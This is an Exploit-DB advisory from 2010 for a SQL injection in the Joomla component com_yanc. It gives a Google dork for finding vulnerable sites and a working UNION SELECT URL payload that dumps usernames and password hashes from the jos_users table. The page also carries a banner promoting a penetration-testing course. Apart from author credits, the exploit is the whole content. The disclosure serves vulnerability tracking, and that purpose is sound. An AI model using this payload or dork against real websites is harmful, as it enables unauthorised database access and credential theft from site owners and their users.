Joomla! Component com_yanc - SQL Injection

EDB-ID:

11603


Author:

snakespc

Type:

webapps


Platform:

PHP

Date:

2010-02-28


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

==============================================================================
[»] Joomla com_yanc Remote Sql Injection Vulnerability
==============================================================================
   
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Founder:  [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ]
[»] Dork:     [inurl:index.php?option=com_yanc "listid" ]   
###########################################################################
 ===[ Exploit ]===
   
[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
[»]Author: Snakespc <-
###########################################################################